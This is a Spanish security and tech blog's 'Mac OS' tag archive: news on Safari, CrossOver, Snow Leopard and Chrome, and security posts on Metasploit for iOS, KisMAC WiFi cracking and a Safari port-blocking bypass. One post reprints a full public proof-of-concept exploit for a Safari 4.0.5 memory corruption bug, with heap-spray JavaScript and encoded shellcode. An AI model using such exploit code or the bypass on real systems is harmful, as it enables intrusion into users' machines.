Mostrando entradas con la etiqueta Mac OS. Mostrar todas las entradas
Mostrando entradas con la etiqueta Mac OS. Mostrar todas las entradas

22 feb. 2013

Cómo Instalar Metasploit en iOS 6.1 (Video)


Si tienes un Ipad o un Iphon este vídeo te puede interesar. Recientemente Japtron (Gracias por su contribución) me ha enviado un vídeo donde explica fácilmente como instalar Metasploit en un dispositivo con iOS 6.1

Sin más que decir les dejo con el vídeo:

22 sept. 2011

Lista de Comandos Post-Exploitation (Win, Linux & Mac)

Les traigo 3 documentos por cortesía de una iniciativa en Room362.com donde se han elaborado listas de comandos útiles para después de una intrusión (Explotación) exitosa en los 3 sistemas operativos más populares (Windows, Linux y Mac).

Muy buena iniciativa, y lo mejor de todo es que todos podemos colaborar ampliando el material de estos textos alojados en Google Docs.

14 may. 2010

[Safari] Se detecta un fallo crítico

Una empresa holandesa, Secunia, ha detectado un fallo crítico en el navegador Safari que permite ejecutar código malicioso. Éste fue detectado en la versión 4.5 del navegador, y corriendo en Windows 7, aunque no se descarta que pueda ocurrir en otras versiones y en Mac. 

Al parecer, el problema puede provenir de la apertura de las nuevas ventanas, pues en el momento de cerrar el pop up, si éste viene de páginas o correos en HTML malicioso, se abre inequívocamente la puerta a la instalación y ejecución de malware.

De momento, Apple no ha confirmado nada, por lo que no se ha lanzado ningún parche de seguridad. Sin embargo, los expertos recomiendan tener cuidado con los mensajes que se abren vía webmail e inhabilitar el JavaScript de aquellas páginas que no nos creen mucha confianza.

Fuente: http://www.ethek.com/

Exploit: http://www.exploit-db.com/exploits/12573
# Title: Apple Safari 4.0.5 parent.close() (memory corruption) 0day Code Execution Exploit
# EDB-ID: 12573
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Krystian Kloskowski
# Published: 2010-05-11
# Verified: yes
# Download Exploit Code
# Download Vulnerable app

view source
print?
<!--
Apple Safari 4.0.5 parent.close() (memory corruption) 0day Code Execution Exploit
Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl>
Tested on: Apple Safari 4.0.5 / XP SP2 Polish
Shellcode: Windows Execute Command (calc)
Local: Yes
Remote: Yes (POPUP must be enabled [Ctrl+Shift+K])
Just for fun ;)
-->
 
<!---------------------------------REMOTE.htm---------------------------------
<script>
window.open("0day.htm"); //parent.close() activation
self.close();
</script>
-----------------------------------REMOTE.htm-------------------------------->
 
<!---------------------------------0day.htm---------------------------------->
<h1>Alt + F4 :)</h1>
 
<script>
function make_buf(payload, len) {
    while(payload.length < (len * 2)) payload += payload;
    payload = payload.substring(0, len);
    return payload;
}
 
var shellcode = unescape("%u9090%u9090"+ //Windows Execute Command (calc)
"%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b"+
"%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca"+
"%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b"+
"%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040"+
"%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0"+
"%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%uf068%u048a"+
"%u685f%ufe98%u0e8a%uff57%u63e7%u6c61%u0063");
 
 
bigblock = unescape("%u0D0D%u0D0D");
headersize = 20;
slackspace = headersize+shellcode.length
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (i=0;i<1000;i++) memory[i] = block + shellcode;
 
var a = parent;
var buf = make_buf("AAAA", 10000);
 
for(var i = 0; i <= 1; i++) {
    a.prompt(alert);
    a.prompt(buf);
    a.close();
}
</script>
<!---------------------------------0day.htm---------------------------------->

[+] Salu2
[+] ZioneR

12 may. 2010

[CrossOver 9.0] Correr aplicaciones nativas de Windows en GNU/Linux y Mac

Una buena noticia para aquellos amantes de los juegos de Windows pero que utilizan GNU/Linux o MacOSX como sistema operativo primario.

A pesar que Valve acaba de estrenar la versión de Steam para Mac, y los rumores indican que luego podría venir una para Linux, siguen habiendo muchísimos juegos que se ven beneficiados de un buen “emulador” o “capa de compatibilidad” para correr juegos y aplicaciones nativas del sistema operativo de Microsoft.
Jeremy White, CEO de CodeWeavers, anunció hoy la salida de CrossOver Games 9.0 para el sistema operativo del pingüino y de ElJobso.

CrossOver viene a ser un software comercial, propiedad de CodeWeavers, basado en el mismísimo Wine pero con interfaz mucho más amigable y con soporte comercial, que permite correr muchísimas aplicaciones y juegos de Windows en Linux y Mac.

Entre las mejoras de la versión 9.0 tenemos:
  • Look mejorado
  • Interfaz de instalación de aplicaciones totalmente rediseñada
  • Más de 8.300 cambios internos de Wine.
  • Adición de soporte para la nueva interfaz de Steam
  • Muchos juegos que no funcionaban ahora lo hacen y los que funcionaban funcionan mejor
Para mayor información pueden visitar la página de CodeWeavers.

A continuación un video demostrativo de CrossOver 9.0.



Fuente: http://www.chw.net/

12 abr. 2010

Bypass Safari Port Blocking (XPS)

El día 23 de Marzo la gente de Goatse Security ha hecho público en la lista seclists.org una vulnerabilidad para saltarste el bloqueo de puertos que llevan los navegadores de Apple. El problema nace de un integer overflow del número de puerto fijado en una dirección url.

Los chicos de Goatse Security realizan las pruebas de concepto con una ipad; en cambio nosotros vamos a ver qué tal funciona la vulnerabilidad con un iphone (también ha sido probada con Safari para Windows):

1. Primero vamos a levantar un puerto 25 en una máquina que hará de "posible servidor smtp":


2. Desde el navegador de nuestro iphone accedemos a la ip donde está escuchando el netcat en el puerto 25 (192.168.1.124) y recibimos el siguiente mensaje:


3. Ahora como bien leemos en el advisory, si nosotros en vez de visitar el puerto 25, visitamos el puerto 65536 (número de puertos TCP) más 25, es decir el 65561, obtendremos el siguiente resultado:




Como vemos, hemos saltado la protección del navegador del bloqueo de puertos; y como bien comenta la gente de Goatse Security, un atacante que ponga una página web maliciosa y que aproveche esta vulnerabilidad podrá realizar diferentes acciones sobre una víctima, como intentar el envio de correos a través de servidores de correo corporativos, realizar ataques de fuerza bruta sobre dispositivos, etc.

Esperaremos los parches que corrijan esta y otras vulnerabilidades asociadas a los productos de la manzana para poder navegar un poquito más seguros.


Fuente: http://www.pentester.es/

13 oct. 2009

Cracking WIFI con MAC OSX

Bueno... aquí un video que encontré en youtube donde muestran como crakear una red Wifi con un MAC gracias a Kismac que es usada para creackear redes utilizando las técnicas de reinyección y captura de paquetes IVS.

La instalacion de Kismac es fácil (como todo en MAC OS) sólo se descarga desde la página oficial, se descomprime el .zip y  se copia a tus aplicaciones.

Web Oficial Kismac:  http://trac.kismac-ng.org/


Windows 7 es más seguro que Snow Leopard (dice un reconocido hacker)

Y quien lo dice no es un cualquiera. Es el mismo que logró romper la seguridad de un MacBook Pro completamente actualizado y parcheado en tan sólo unos segundos… Me refiero a Charlie Miller.

Según Charlie, Snow Leopard tiene un sistema ASLR (Address Space Layout Randomization) ineficaz y no tiene DEP (Data Execution Prevention), un sistema que sí tiene Windows 7 y que impide que los programas accedan a zonas de memoria restringidas.

Se tendrán que poner las pilas la gente de Apple, ya que quien les regaña no es un don nadie… Además, si a día de hoy no existen tantos virus para Mac como los que hay para Windows es simplemente por la cota enorme de mercado de éste último, que se antoja mucho más jugoso para los virusmaníacos. Pero llegará un día en que Apple deba hacer más hincapié en la seguridad… ¿Ustedes qué opinan?

11 oct. 2009

¿Cuál es el sistema operativo perfecto?

 Se abre la polémica…  GraphJam publica este diagrama de Venn en el que pone de relieve las principales cualidades de los principales sistemas operativos.
Así, del gráfico se desprende lo siguiente:

  • Windows es un sistema amigable y personalizable pero no es estable.
  • Mac OS es un sistema amigable y estable pero no es personalizable.
  • Linux es un sistema personalizable y estable pero no es amigable.
Fuente: http://www.dosbit.com/

12 sept. 2009

Snow Leopard es velocísimo

Snow Leopard es velocísimo apple
Parece que la gente de Macworld ha estado un poco inquieta y han realizado unas pruebas de velocidad entre Leopard y su nueva versión, Snow Leopard, para saber cuál de los dos es más rápido.
Las pruebas se realizaron ejecutando diferentes aplicaciones en ambos OS instalados en tres Mac’s distintas:
  • iMac de 20” con procesador Core 2 Duo a 2.6Ghz y 2Gb de RAM.
  • MacPro Xeon a 2.8Ghz de ocho núcleos y 4Gb de RAM.
  • MacBook Pro de 15” con procesador Core 2 Duo a 2.8Ghz y 4Gb de RAM.
De los 16 programas que se ejecutaron en ambas versiones, Snow Leopard ganó en 8, perdió en 2 y en los restantes 6 obtuvieron resultados combinados dependiendo de la máquina. La tabla completa, aquí abajo…
Snow Leopard
Cabe destacar que éstos resultados cambiarán rotundamente cuando los desarrolladores de software comiencen a “exprimir” la versión de 64bits del sistema operativo.

Fuente: http://www.dosbit.com/

11 sept. 2009

Chrome 4.0.203.4 para Mac OS X

Chrome 4.0.203.4 para Mac OS X empresasSiguiendo con las actualizaciones realizadas en las versiones Chrome para entornos Windows y Linux, los de Mountain View acaban de hacer disponible a todo el mundo una fresca build de du navegador para Mac OS X: versión 4.0.203.4.
Incluye mejoras de apariencia en varios componentes de la UI, se han solucionado algunos problemas que provocaban fallos y “cuelgues” en la aplicación así como varios problemas menores.
Para descargar Chrome 4.0.203.4 para Mac OS X no tienes más que descargarlo:

Descarga Chrome para Mac OS.

Fuente: http://www.dosbit.com/